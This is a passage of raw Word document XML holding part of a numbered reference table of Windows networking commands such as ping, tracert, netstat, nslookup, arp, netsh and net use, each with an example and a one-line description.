          <w:p w14:paraId="043468F3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>ping &lt;hostname/IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69AAF7BC" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Tests network connectivity by sending ICMP packets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="64EC4D08" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA4B42C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA0B108" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tracert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EB470D4" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>tracert</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;hostname/IP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B591E4D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Traces the route taken by packets to reach a target host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="76DE478B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58541CAC" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DDCDA7C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB6A563" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat -an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55F36E60" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays all active network connections and listening ports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="24BDF46A" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486B8433" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FBB7729" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35D7498B" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nslookup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> &lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F2D37AF" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Performs DNS lookups to get IP addresses for domain names.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="0754749B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2656570F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5956980A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A139D4F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> -a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D86CC33" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Shows or clears ARP cache entries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="089C2D30" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0A1B00" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74BAADC8" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38A9C93E" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>route print</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649A2577" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays or modifies the local routing table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="59969A4C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A7E2D94" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A767E0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0248BF71" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE4F4F8" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays the system’s name on the network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="40873288" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01AA3C0A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ACE0AB8" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>netsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7E32CD" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>netsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> interface show interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D6FAE85" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Configures or manages network interfaces, IPs, and firewall settings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="60A4FE60" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAA5BF5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B968399" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nbtstat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="484343E5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>nbtstat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t xml:space="preserve"> -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="579094B0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays NetBIOS name table and TCP/IP session information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="47ED217D" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34BF8BEE" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3368083F" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>getmac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39112A1C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>getmac</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62894A1D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays MAC addresses of all network adapters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="45F60E82" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F2A81EA" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CC6CF1D" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net view</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="020474F7" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net view</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0007CAA7" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Lists computers and shared resources on the network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="5D34AEED" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9777A7" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD5EFD3" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net use</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="465E474C" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net use Z: \\computer\share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E1F9B0" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Connects to shared resources or network drives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="3A8A6D0C" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="492799B5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F4085E8" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="395DBDE5" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>net share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C4ABEE6" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>Displays or manages shared folders on the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00074E6B" w:rsidRPr="00074E6B" w14:paraId="4B416540" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8649FC" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19D14694" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ano</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C8D6353" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
            <w:r w:rsidRPr="00074E6B">
              <w:t>netstat -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00074E6B">
              <w:t>ano</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27282C8A" w14:textId="77777777" w:rsidR="00074E6B" w:rsidRPr="00074E6B" w:rsidRDefault="00074E6B" w:rsidP="00074E6B">
